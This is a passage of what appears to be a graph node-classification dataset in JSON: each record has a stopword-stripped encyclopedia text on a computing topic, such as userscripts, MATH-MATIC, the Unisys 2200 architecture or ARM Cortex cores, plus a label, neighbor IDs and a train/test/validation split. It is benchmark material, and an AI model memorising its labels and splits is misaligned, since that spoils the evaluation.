    "node_id": 1863,
    "label": 9,
    "text": "Userscript:userscript userscript user script program usually written javascript modifying web pages augment browsing desktop browsers firefox enabled use userscript manager browser extension greasemonkey presto-based opera browser supported userscripts referred user javascript placed designated directory userscripts often referred greasemonkey scripts named original userscript manager firefox wikipedia feature enabled registered users allows install userscripts augment editing viewing encyclopedia pages userscript manager type browser extension augmented browsing technology provides user interface manage scripts main purpose userscript manager execute scripts webpages loaded common operations performed userscript manager include downloading creating installing organizing deleting editing scripts well modifying script permissions e.g website exceptions one aspect userscripts shared uploaded userscript repository become available users downloading examples userscript repositories include greasy fork openuserjs",
    "neighbors": [
      9241,
      9780,
      3462
    ],
    "mask": "None"
  },
  {
    "node_id": 1864,
    "label": 9,
    "text": "MATH-MATIC:math-matic math-matic marketing name at-3 algebraic translator 3 compiler early programming language univac univac ii math-matic written beginning around 1955 team led charles katz direction grace hopper preliminary manual produced 1957 final manual following year syntactically math-matic similar univac contemporaneous business-oriented language flow-matic differing providing algebraic-style expressions floating-point arithmetic arrays rather record structures expressions math-matic could contain numeric exponents including decimals fractions way custom typewriter math-matic programs could include inline assembler sections arith-matic code univac machine code univac 1000 words memory successor univac ii little 2000 math-matic allowed larger programs automatically generating code read overlay segments uniservo tape required compiler attempted avoid splitting loops across segments proposing collaboration acm led algol 58 gesellschaft für angewandte mathematik und mechanik wrote considered math-matic closest available language proposal contrast backus fortran math-matic emphasise execution speed compiled programs univac machines floating-point hardware math-matic translated via a-3 arith-matic pseudo-assembler code rather directly univac machine code limiting usefulness sample math-matic program",
    "neighbors": [
      1952,
      9345,
      9889,
      4483,
      8262,
      9804,
      2798,
      7032,
      1976,
      3960,
      5277
    ],
    "mask": "None"
  },
  {
    "node_id": 1865,
    "label": 2,
    "text": "Lions'_Commentary_on_UNIX_6th_Edition,_with_Source_Code:lions commentary unix 6th edition source code lions commentary unix 6th edition source code john lions 1976 contains source code 6th edition unix kernel plus commentary commonly referred lions book despite age still considered excellent commentary simple high quality code many years lions book unix kernel documentation available outside bell labs although license 6th edition allowed classroom use source code license 7th edition specifically excluded use book spread illegal copy machine reproductions kind samizdat commonly held copied book computer science book reprinted 1996 peer-to-peer communications unix operating system source code level six kernel source code lightly edited lions better separate functionality — system initialization process management interrupts system calls basic i/o file systems pipes character devices procedures symbols listed alphabetically cross reference code presented run pdp-11/40 rk-05 disk drive lp-11 line printer interface pcl-11 paper tape writer kl-11 terminal interface suitable pdp-11 emulator simh commentary unix operating system starts notes unix useful documentation unix manual pages dec hardware manuals section architecture pdp-11 chapter read c programs source commentary follows divided sections code book ends suggested exercises student lions explains commentary supplements comments source possible understand code without extra commentary reader advised read notes needed commentary also remarks code might improved source code commentary originally produced may 1976 set lecture notes lions computer science courses 6.602b 6.657g university new south wales department computer science unix news march 1977 announced availability book unix licensees lions trouble keeping popularity 1978 available bell labs announced unix version 7 usenix june 1979 academic/research license longer automatically permitted classroom use thus licensees longer able use lions notes classes operating systems however thousands computer science students around world spread photocopies could study legally class would sometimes meet hours discuss book many pioneers unix open source treasured multiple-generation photocopy follow-on effects license change included andrew s. tanenbaum creating minix tanenbaum wrote operating systems 1987 various unix people particularly peter h. salus dennis ritchie berny goodheart lobbied unix various owners novell santa cruz operation many years allow book published officially 1996 santa cruz operation finally authorised release twenty-year-old 6th edition source code along source code versions ancient unix full code plus 1977 version commentary published peer-to-peer communications reissue includes commentary michael tilson sco peter salus dennis ritchie ken thompson peter collinson greg rose mike o'dell berny goodheart peter reintjes infamous program comment expected understand occurs line 2238 source code lions commentary p. 22 end comment explaining process exchange mechanism refers line 325 file slp.c source code reads major reason piece code hard understand depended quirk way c-compiler pdp-11 saved registers procedure calls code failed ported machines redesigned version 7 unix dennis ritchie later explained meaning remark xv6 modern reimplementation sixth edition unix ansi c multiprocessor x86 systems",
    "neighbors": [
      3488,
      6369,
      9027,
      132,
      9444,
      7655,
      7983,
      499,
      5492,
      7187,
      8628,
      2045,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 1866,
    "label": 7,
    "text": "Distributed_memory:distributed memory computer science distributed memory refers multiprocessor computer system processor private memory computational tasks operate local data remote data required computational task must communicate one remote processors contrast shared memory multiprocessor offers single memory space used processors processors aware data resides except may performance penalties race conditions avoided distributed memory system typically processor memory form interconnection allows programs processor interact interconnect organised point point links separate hardware provide switching network network topology key factor determining multiprocessor machine scales links nodes implemented using standard network protocol example ethernet using bespoke network links used example transputer using dual-ported memories key issue programming distributed memory systems distribute data memories depending problem solved data distributed statically moved nodes data moved demand data pushed new nodes advance example problem described pipeline data x processed subsequently functions f g h etc result h g f x expressed distributed memory problem data transmitted first node performs f passes result onto second node computes g finally third node computes h also known systolic computation data kept statically nodes computations happen locally changes edges reported nodes example simulation data modeled using grid node simulates small part larger grid every iteration nodes inform neighboring nodes new edge data similarly distributed shared memory node cluster access large shared memory addition node limited non-shared private memory distributed shared memory hides mechanism communication hide latency communication",
    "neighbors": [
      785,
      7313,
      7699,
      7963,
      6815,
      2210,
      5798,
      9126,
      6184,
      2345,
      4909,
      7218,
      10675,
      8501,
      5948,
      4286,
      2113,
      8514,
      5956,
      4423,
      1480,
      6909,
      330,
      7497,
      8523,
      10439,
      4308,
      2008,
      344,
      2394,
      731,
      2140,
      2264,
      1503,
      11487,
      4194,
      5090,
      11618,
      7142,
      5223,
      2536,
      8810,
      4205,
      1776,
      6774,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 1867,
    "label": 5,
    "text": "Bidirectional_Forwarding_Detection:bidirectional forwarding detection bidirectional forwarding detection bfd network protocol used detect faults two forwarding engines connected link provides low-overhead detection faults even physical media n't support failure detection kind ethernet virtual circuits tunnels mpls label switched paths bfd establishes session two endpoints particular link one link exists two systems multiple bfd sessions may established monitor one session established three-way handshake torn way authentication may enabled session choice simple password md5 sha1 authentication available bfd discovery mechanism sessions must explicitly configured endpoints bfd may used many different underlying transport mechanisms layers operates independently therefore needs encapsulated whatever transport uses example monitoring mpls lsps involves piggybacking session establishment lsp-ping packets protocols support form adjacency setup ospf is-is may also used bootstrap bfd session protocols may use bfd receive faster notification failing links would normally possible using protocol keepalive mechanism session may operate one two modes asynchronous mode demand mode asynchronous mode endpoints periodically send hello packets number packets received session considered demand mode hello packets exchanged session established assumed endpoints another way verify connectivity perhaps underlying physical layer however either host may still send hello packets needed regardless mode use either endpoint may also initiate echo function function active stream echo packets sent endpoint sends back sender via forwarding plane used test forwarding path remote system june 2011 bfd protocol standardization process entered proposed standard stage rfc 5880 defines bfd protocol detecting mpls lsp failure using bfd monitor connectivity across multiple network hops using bfd ipv4 ipv6 bfd operation conjunction open shortest path first ospf is-is protocols also outlined rfc 5881",
    "neighbors": [
      3751,
      9868,
      10924,
      2206,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 1868,
    "label": 1,
    "text": "Canmore_(database):canmore database canmore online database information 320,000 archaeological sites monuments buildings scotland begun royal commission ancient historical monuments scotland historic environment scotland maintained since 2015 canmore database part national record historic environment nrhe formerly national monuments record scotland nmrs contains around 1.3 million catalogue entries includes marine monuments designated official wreck sites fall protection wrecks act wreck",
    "neighbors": [
      248,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 1869,
    "label": 3,
    "text": "Unisys_2200_Series_system_architecture:unisys 2200 series system architecture figure shows high-level architecture os 2200 system identifying major hardware software components majority unisys software included subsystems applications area model example database managers subsystems compilers applications details system architecture covered unisys publication 3850 7802 instruction processor programming reference manual also see univac 1100/2200 series 1100 series used 36-bit word 6-bit characters since 1962 word character size department defense dod requirement since military needed able calculate accurate trajectories design bridges perform engineering scientific calculations needed 32 bits precision 32-bit floating point number provided 6 digits accuracy 36 bit number provided 8 digits accuracy accepted minimum requirement since memory storage space costs drove system going 64 bits simply acceptable general systems use ones complement arithmetic unusual time almost computer manufacturers time delivered 36-bit systems 6-bit characters including ibm dec general electric sylvania 6-bit character set used 1100 series also dod mandated set defined army signal corps called fieldata data returned field 1108 provided 9-bit character format order support ascii later iso 8-bit sets extensively used 1980s space constraints 2200 series architecture provides many registers base registers logically contain virtual address points word code data bank segment may point beginning bank word within bank index registers used instructions modify offset specified assumed base register simple arithmetic add subtract may performed index registers addition index registers consist lower offset portion upper increment portion instruction may use offset value index register part address specify increment added offset allows loops accomplished fewer instructions incrementing index step size accomplished without separate instruction arithmetic registers allow full set computational instructions including floating point operations instructions work adjacent pairs registers perform double-precision operations even-odd constraints two registers may used double-precision value four arithmetic registers also index registers sets overlap – index register x12 arithmetic register a0 allows full range calculations performed indexes without move results rest registers known r registers used fast temporary storage certain special functions r1 holds repeat count instructions may repeated block transfer execute repeated etc. r2 holds bit mask instructions perform bitwise logical operation addition functions e.g. masked load upper two full sets registers x r b one set user registers used applications portions operating system saved restored part activity thread state set exec registers used interrupt processing routines portions operating system want avoid save restore user registers exec registers writable user applications although user code read result exec carefully designed never leave private secure confidential information registers instruction interpretation chooses appropriate register set use based bit processor state register bit always set changed privileged interrupt registers also visible address space exec portion protected reference non-privileged code result fault interrupt 2200 series uses 36-bit segmented virtual address space ’ look later addressing architecture 2200 series cisc architecture system large number instructions current count 245 many addressing variants variants encoded directly instruction format partial word references dependent processor state register settings many instructions also perform complex functions one implements large part cobol edit verb figure shows building blocks architecture data comm two primary examples software subsystems live protection ring user application exec many subsystems users write mentioned earlier 2200 series uses 36-bit segmented virtual address original notion segmented space came earliest implementation emphasized code data separation performance use shared code banks years expanded provide greater flexibility levels sharing far greater protection security reliability controlled access shared data also introduced virtual address consists three parts high-order 3 bits define sharing level heart entire addressing protection scheme every thread eight bank descriptor tables segment descriptor tables industry based b16-b23 tables indexed level – level 0 refers bank descriptor table bdt based b16 level 2 bdt based b18 etc level 0 level 2 bdts common threads system every run process level 4 bdt bdt common threads run every user thread unshared level 6 bdt extended-mode activity thread always six banks segments totally unique one return control stack holds information calling structure including security relevant privilege state changes accessible thread except use call return similar instructions major part protection reliability mechanism applications cause bad effects changing return addresses overwriting return control stack another unique bank automatic storage bank activity local store stack used compilers hold local variables created within block also used hold parameter lists passed call one checks made operating system behalf call made protected subsystem ensure operands thread-local stack thread right access memory region referenced parameters parameters kept thread-local space chance thread may change validation responsibility called procedure perform similar checks secondary parameters may exist shared space i.e. primary parameter points structure contains pointers procedure expected copy pointers local space validating use internally held validated pointer activities may create additional segments limit available address space 2 words 8gw 36gb convenient way multi-threaded applications get large amounts memory space knowing totally thread-safe taking space away rest available program activity program independent space meaning application say 100 activities able use 800gw 3tb virtual space basic-mode activities start banks basic-mode programs aware virtual address space calls extended-mode subsystems cause banks created os 2200 implement programs exactly way unix linux windows implement processes closest analogy obvious difference os 2200 permits single program per run job session executing time program may hundreds threads spawn programs run concurrently several banks program level contain mixture run job session information program information control structures operating system access read-only access program programs may retrieve information structures debugging purposes retrieve things like user-id terminal-id without overhead system call written program contain things like thread state save areas file control blocks accounting information rest banks used program program object file executed operating system obtains bank information file creates banks needed loads bank initial state file simplest program single bank containing code data considered bad form permitted compatibility old applications create application assembly language standard compilers create one code banks one data banks normally code banks marked read-only debugging reliability aid security concerns either way program affect program thus address space distinct programs system nothing program change contents program ’ memory os shared subsystems protected mechanisms discussed later even read access prohibited os subsystem memory almost cases code program possible create shared subsystem generally readable even writable multiple programs must explicitly installed way privileged system administrator programs initially created banks specified object file single activity may use system calls create additional banks within program level additional activities closest analogy shared subsystem .dll subsystem much like program many respects except activities associated instead accessed programs subsystems typically via call instruction fact program subsystem plus one activities every activity belongs home subsystem program created subsystem concept important encapsulation access rights privilege within home subsystem activities typically share common access rights code data banks code banks home subsystem usually read-only even execute-only contain constant data activities right execute subsystems also combinations banks may contain data banks well code banks globally shared subsystems must installed system someone appropriate administrator privileges subsystems may also open files database manager subsystem opens database files use typically exclusive access rights operating system attach banks subsystem hold file control tables os level contains banks exec banks never directly accessible either programs global subsystems entry points os handled way protected subsystem calls made os always via gates instructions exist purpose er executive request via interrupts next part virtual address bdi bank descriptor index level field selected particular bank descriptor table base register b16-b23 base registers b16-b23 part activity state maintained exec direct access activity bank descriptor tables program activity levels exist within program-level banks belong operating system bdi simply index bank descriptor table entry table contains information bank entry describes 1mb 256kw virtual address space larger contiguous space needed consecutive entries logically combined create larger bank maximum 2 words bank descriptor table entry bank descriptor – bd gives size bank small 256kw large 16mw large 1gw small bank always represented single bd large banks represented 64 consecutive bds large bank 4096 bds large large banks need use 64 4096 consecutive bds use many needed provide virtual address space required entry also contains upper lower limits allowable offsets within bank virtual addresses outside limits generate fault interrupt allows small banks example containing message virtual space reserved actually needs provides debugging check bad pointers indices bd also contains key value access control fields fields indicate whether read write execute permission granted instruction processor 3 bits special access permissions sap applies activities executing within owning subsystem really matching key value general access permissions gap applies everyone else usually zero access exec sets key value state activity may changed gate interrupt transitions 2200 series protection architecture uses three pieces activity state reflected hardware state processor privilege pp ring domain processor privilege controls ability execute privileged instructions access protected registers state pp=0 used exec gives full access instructions privileged state exec activities user activities used gate access exec api run pp=0 pp=1 restricts privileged instructions allow reading day clocks reading contents privileged registers none privileged registers contain truly sensitive information allowing general read access could easily lead undetected errors user programs basically pp=1 instructions change addressing environment change clocks change instrumentation state perform i/o restricted pp=1 rarely used pp=2 normal user mode state code executes restriction pp=1 also pp=3 restricts instructions user program execute currently use many existing programs using instructions intent restrict access instructions may system model dependent domain mechanism heart protection mechanism bd bank descriptor lock field consisting ring number domain number also key field state activity key matches lock ring key less ring lock activity special access permission otherwise activity general access permission ring allows overriding domain protection mechanism user applications run ring=3 protected subsystems run ring=2 gives access data still allowing access parameters data calling user ’ space note still possible thread cause protected subsystem access user ’ space thread ’ bank descriptor tables use ring=0 used os allows access data still able access parameters passed either user programs protected subsystems gates another part protection mechanism gate data structure controls transitions domains gate lives gate bank hardware enforces references gates must addresses proper offset multiple gate size within gate bank gate contains target address new values pp ring domain may contain hidden parameter passed target protected subsystems directly accessible subsystems instead subsystem must request gate built gate bank access subsystem permits operating system perform access control checks linking system find gate address associated entry point fact whole mechanism usually transparently handled within linking system hidden parameter permits example file i/o gate contain address handle file control block since guaranteed correct created os user opened file many error checks eliminated path length i/o os 2200 designed handle 32 instruction processors cpus great deal design done years optimize environment example os 2200 makes almost use critical sections design ’ high probability multiple processors executing code instead uses data locking finest granularity data possible generally locks deal single instance data object e.g. activity control structure file control block contained within data structure object minimizes likelihood conflicts global locks set updating list objects lock set long takes update links list even dispatching done separate locks different priority levels check made empty priority level without setting lock lock need set adding removing item queue register set visible address space registers appear exist first 128 words 200 current instruction bank b0 referenced data item impose restriction compilers place data constants first 128 words code bank result expansion instruction set without requiring additional operation codes register-to-register operations accomplished register-storage operation codes typical instructions contain function code target source register index register base register displacement field function code qualifier indicates immediate data displacement base h fields combine form single 18-bit immediate value allows loading adding multiplying etc small constants eliminate memory reference associated storage processor state captured stack interrupt contains information needed return control interrupted activity determine type interrupt interrupts may occur middle long instructions state deals possibility basic mode another whole form instruction formats addressing basic mode provides compatibility previous systems back 1108 practical purposes hardware architecture defines rules addresses instructions converted forms obvious difference basic mode lack explicit b registers instructions instead four implicitly used b registers b12-b15 complex algorithm using limits banks represented b registers operand address b register within current instruction found interesting instructions 2200 repertoire locking synchronization instructions conditional replace familiar quite similar compare swap intel architecture instructions always gain exclusive use memory/cache-line holding referenced word ts tss check bit referenced word bit clear set continue ts skip tss bit set either interrupt ts fall next instruction tss ts interrupt os takes one several actions depending instruction sequence activity priority real time exec activities simply get control back allow retry unless even higher-priority activity waiting presumption lock set another processor soon cleared user activity running real time priority may priority temporarily reduced placed back dispatching queues alternatively code sequence may indicate test set queuing used case os places activity wait state chains end list activities waiting particular lock activities clearing lock check see waiting notify os allow one try test set queuing typically used synchronization within subsystems database manager activities many programs may executing result mechanisms efficient low overhead synchronization among activities queuing architecture another interesting special case specifically designed allow efficient handling messaging number messages waiting processing could almost unlimited also aimed reducing one primary costs messaging namely constantly move messages around memory even moving communication manager message queue subsystem processing program eliminated instead message placed small bank instructions allow placing bank descriptors banks queue removing queue message placed queue sending program subsystem longer access bank removed address space message retrieved queue bank becomes part receiver address space queuing instructions also provide activity synchronization functions e.g. wait message pointers moved moved way ensures security integrity moved data message visible recipient i/o 2200 series systems handled i/o processors processors offload large portions i/o path length recovery fully isolating main system i/o faults interrupts bus errors etc greatly improve reliability availability i/o processors come three different types storage communications clustering real difference firmware load i/o processors controlled operating system os 2200 provide raw mode i/o called arbitrary device i/o even os validates program accessing allowed device handles interrupts faults passing appropriate status program programs must granted privileges security officer access devices arbitrary mode may limited security officer system operator specific devices arbitrary i/o allowed device also use program system device must exclusively allocated program os takes general calls programs generates command packets real memory device addresses passed i/o processor firmware i/o processor actually creates device specific e.g. scsi packets sets dma issues i/o services interrupts",
    "neighbors": [
      8352,
      9911,
      2477,
      2638,
      6797,
      1776,
      5457,
      823,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 1870,
    "label": 7,
    "text": "Ansarada:ansarada ansarada provider ai-powered virtual data rooms material information platforms business transactions material events mergers acquisitions fundraising tenders ipos historically ansarada virtual data rooms enabled hosting exchange management confidential material information bidders sellers mergers acquisitions due diligence process software service saas solutions ansarada also creators world first video game since launched january 2014 138,000 sessions total screen views amounting 9.5 million ansarada offices sydney london new york chicago well employees working asia africa continental europe sydney-based ansarada founded 2005 andrew slavin chief technology officer sam riley chief executive rachel riley chief financial officer daphne chang company named first two letters founder first names four founders employees continue 80 percent company group investment bankers lawyers owning remaining 20 percent ansarada disclose sales profits ansarada claims 60 percent market share australian deals employs 200 people offices sydney chicago new york city london amsterdam frankfurt johannesburg hong kong development centre ho chi minh city july 2016 ansarada partnered pyco group launched new software development center vietnam range artificial intelligence features introduced ansarada virtual data rooms vdr 2017 ai-powered alternative traditional virtual data rooms 100-plus new features allow users “ illuminate risk opportunity raise protect potential optimize processes deal preparation execution close ” sell-side users ansarada rooms view ai bidder engagement score assigns numerical value likelihood potential bidder make offer predicts win objectively tells sellers interest ai bidder engagement score calculated using machine learning algorithm takes account performance 57 separate metrics time aida acronym ansarada intelligent data assistant extracts on-demand insights data based activity within ansarada room allows information accessed natural language need login click menus features desktop product users interact aida chat interface available iphone itunes app store virtual assistant uses natural language processing understand user requests plus 20 “ skills ” extract data insights provide answers october 2017 ansarada launched world first material information platform deliver readiness service raas platform uses new technologies artificial intelligence machine learning help businesses ready important outcomes structuring material information correctly assigning accountability people tracking progress objective score readiness selection ansarada clients include law firms corporate finance software property private equity venture capital ansarada launched game january 2014 appeal primarily investment bankers looking express competitive sides risk-free setting new york times reported ten hours games release attracted 1,000 users played 3,300 times according new york times",
    "neighbors": [
      6153
    ],
    "mask": "Test"
  },
  {
    "node_id": 1871,
    "label": 3,
    "text": "ARM_Cortex-A55:arm cortex-a55 arm cortex-a55 microarchitecture implementing armv8.2-a 64-bit instruction set designed arm holdings cambridge design centre cortex-a55 2-wide decode in-order superscalar pipeline cortex-a55 serves successor arm cortex-a53 designed improve performance energy efficiency a53 arm stated a55 15 improved power efficiency 18 increased performance relative a53 memory access branch prediction also improved relative a53 cortex-a75 cortex-a55 cores first products support arm dynamiq technology successor big.little technology designed flexible scalable designing multi-core products cortex-a55 available sip core licensees design makes suitable integration sip cores e.g gpu display controller dsp image processor etc one die constituting system chip soc arm also collaborated qualcomm semi-custom version cortex-a55 used within kryo 385 cpu core semi-custom core also used qualcomm mid-range socs kryo 360 silver kryo 460 silver",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6926,
      5417,
      810,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 1872,
    "label": 3,
    "text": "ARM_Cortex-A75:arm cortex-a75 arm cortex-a75 microarchitecture implementing armv8.2-a 64-bit instruction set designed arm holdings sophia design centre cortex-a75 3-wide decode out-of-order superscalar pipeline cortex-a75 serves successor cortex-a73 designed improve performance a73 maintaining efficiency according arm a75 expected offer 16–48 better performance a73 targeted beyond mobile workloads a75 also features increased tdp envelope 2 w enabling increased performance cortex-a75 cortex-a55 cores first products support arm dynamiq technology successor big.little technology designed flexible scalable designing multi-core products cortex-a75 available sip core licensees design makes suitable integration sip cores e.g gpu display controller dsp image processor etc one die constituting system chip soc arm also collaborated qualcomm semi-custom version cortex-a75 used within kryo 385 cpu semi-custom core also used qualcomm mid-range socs kryo 360 gold",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      630,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      6926,
      5417,
      810,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 1873,
    "label": 4,
    "text": "Device_configuration_overlay:device configuration overlay device configuration overlay dco hidden area many today ’ hard disk drives hdds usually information stored either dco host protected area hpa accessible bios os user however certain tools used modify hpa dco system uses identify_device command determine supported features given hard drive dco report command supported features nonexistent drive smaller actually determine actual size features disk device_configuration_identify command used output command compared output identify_device see dco present given hard drive major tools remove dco order fully image hard drive using device_configuration_reset command permanently alters disk unlike host protected area hpa temporarily removed power cycle device configuration overlay dco first introduced ata-6 standard allows system vendors purchase hdds different manufacturers potentially different sizes configure hdds number sectors example would using dco make 80-gigabyte hdd appear 60-gigabyte hdd os bios ... given potential place data hidden areas area concern computer forensics investigators additional issue forensic investigators imaging hdd hpa and/or dco certain vendors claim tools able properly detect image hpa either silent handling dco indicate beyond capabilities tool hdat2 free software program ms-dos used create/remove host protected area hpa using command set max create/remove dco hidden area using command dco modify also functions dco data synergy freeware atatool utility used detect dco windows environment recent versions allow dco created removed frozen guidance software encase comes linux-based tool images hard drives called linen linen 6.01 validated national institute justice nij october 2008 found tool remove either host protected areas hpas dcos however linux test environment automatically removed hpa test drive allowing tool image sectors hidden hpa tool acquire sectors hidden dco accessdata ftk imager 2.5.3.14 validated national institute justice nij june 2008 findings indicated physical acquisition made drive hidden sectors either host protected area device configuration overlay tool remove either hpa dco tool acquire sectors hidden hpa variety hardware imaging tools found successfully detect remove dcos nij routinely tests digital forensics tools publications found http //nij.ncjrs.gov/app/publications/pub_search.aspx searchtype=basic category=99 location=top psid=55 nist https //www.nist.gov/itl/ssd/cs/cftt/cftt-disk-imaging.cfm",
    "neighbors": [
      9319,
      11368,
      1515,
      9166,
      7983,
      2447,
      11182,
      9458,
      4408,
      9086
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1874,
    "label": 3,
    "text": "Compaq_Evo:compaq evo compaq evo series business desktop laptop pcs thin clients made compaq hewlett-packard following 2002 merger evo brand introduced compaq may 2001 business-oriented brand replaced compaq deskpro brand desktops armada notebooks evo rebranded hp compaq used 2013 desktops small made positioned horizontally instead vertically monitor could placed top save space featured sleek silver black compact design early models shipped cd-rom drives compaq eventually shipped evo cd-rw drives dvd-rom drives design models allowed one cd dvd drive models bigger designs 2 cd dvd drives models also shipped 3½ floppy drive positioned cd dvd drive models also 2 usb 2.0 ports front convenience well two back human interface devices external volumes also headphone microphone jack front line line back laptops conservative design described one reviewer old-school black squared-off-corner business notebook models tough black case reminiscent ibm thinkpad midsize 14 15 screen good multimedia capability offered 256 mb ram standard amount easily upgraded 512 mb even 1 gb thin clients based geode processor family compaq evo desktop computer great option businesses schools compact cheap design affordable needed specs businesses schools compaq evo computers shipped standard windows xp windows 2000 running compaq evo shipped pentium 4 processors laptop evos shipped centrino platforms last evo-branded models released 2003 later replaced re-branded like compaq-branded products hp compaq products final model carry compaq evo name n620c notebook early pentium-m system featured 1.6ghz processor n620c intel centrino-based instead used compaq wireless module snapped onto multiport slot lid notebook desktop models notebook models thin clients",
    "neighbors": [
      8229,
      1638,
      11100,
      3304,
      5384,
      6765,
      3214,
      2258,
      1304,
      3323,
      5756
    ],
    "mask": "None"
  },
  {
    "node_id": 1875,
    "label": 4,
    "text": "Risk_management_framework:risk management framework risk management framework united states federal government policy standards help secure information systems computers networks developed national institute standards technology two main publications cover details rmf nist special publication 800-37 guide applying risk management framework federal information systems nist special publication 800-53 security privacy controls federal information systems organizations nist special publication 800-37 guide applying risk management framework federal information systems developed joint task force transformation initiative working group transforms traditional certification accreditation c process six-step risk management framework rmf risk management framework rmf illustrated right provides disciplined structured process integrates information security risk management activities system development life cycle rmf steps include lifecycle information system encounter many types risk affect overall security posture system security controls must implemented rmf process supports early detection resolution risks risk categorized high level infrastructure risks project risks application risks information asset risks business continuity risks outsourcing risks external risks strategic risks infrastructure risks focus reliability computers networking equipment project risks focus budget timeline system quality application risks focus performance overall system capacity information asset risks focus damage loss disclosure unauthorized part information assets business continuity risks focus maintaining reliable system maximum up-time outsourcing risks focus impact 3rd party supplier meeting requirements external risks items outside information system control impact security system strategic risks focuses need information system functions align business strategy system supports",
    "neighbors": [
      10821,
      5373,
      4798
    ],
    "mask": "Train"
  },
  {
    "node_id": 1876,
    "label": 5,
    "text": "Dynamic_synchronous_transfer_mode:dynamic synchronous transfer mode dynamic synchronous transfer mode dtm optical networking technology standardized european telecommunications standards institute etsi 2001 beginning specification etsi es 201 803-1 dtm time division multiplexing circuit-switching network technology combines switching transport designed provide guaranteed quality service qos streaming video services used packet-based services well marketed professional media networks mobile tv networks digital terrestrial television dtt networks content delivery networks consumer oriented networks triple play networks dtm architecture conceived 1985 developed royal institute technology kth sweden published february 1996 research team split two spin-off companies reflecting two different approaches use technology one companies remains active field delivers commercial products based dtm technology name net insight",
    "neighbors": [
      10368,
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2356,
      2996,
      9909,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      3168,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      2802,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 1877,
    "label": 2,
    "text": "Foomatic:foomatic foomatic configurable printing filter uses ppd files configuration generate appropriate output given printer spooler independent means used common unix printing system cups lprng others uses ghostscript background using options according ppd file printer currently developed openprinting workgroup linux foundation like cups foomatic supposes applications produce output postscript output spools postscript printer action needed otherwise generic way act foomatic-rip knows available printer translate postscript data directly printer language without creating intermediate raster file components package following free drivers specifically developed work foomatic",
    "neighbors": [
      10885,
      3974,
      8360,
      7626,
      4011,
      6830,
      10352,
      8628,
      8763
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1878,
    "label": 2,
    "text": "Blued_(macOS):blued macos blued bluetooth daemon macos previously mac os x started system interacted directly user daemon handles service discovery link key management incoming connection acceptance",
    "neighbors": [
      11521,
      2819,
      1796,
      9734,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      8852,
      9109,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      811,
      3371,
      5292,
      1710,
      6700,
      8877,
      1074,
      10036,
      3766,
      2232,
      9912,
      11257,
      9406,
      6849,
      4933,
      713,
      9418,
      9035,
      3790,
      7118,
      5713,
      3670,
      9430,
      4184,
      3035,
      4571,
      2141,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      6771,
      2676,
      7928,
      8441,
      7163,
      7422
    ],
    "mask": "None"
  },
  {
    "node_id": 1879,
    "label": 9,
    "text": "Creative_Basic:creative basic creative basic cb third-generation event-driven programming language windows integrated development environment ide current version executables interpreted require runtime libraries installed end-user computer planned future version compiled executables creative basic extensive command set access application programming interface api libraries available microsoft windows operating system although modern version dates 2007 development completely compatible ibasic use worldwide since 2002 notable projects jerry muelver wikiwriter wikiwriter chm wizard alyce watson mike rainey manufacturing engineering programs see links hello program program open console window print 10 random numbers program create gui window exit button event handling routine",
    "neighbors": [
      7691,
      1805,
      6797,
      9997,
      786,
      11412,
      22,
      3481,
      9881,
      3613,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      7983,
      11315,
      4410,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      9714,
      5747,
      6778,
      6910,
      1535
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1880,
    "label": 6,
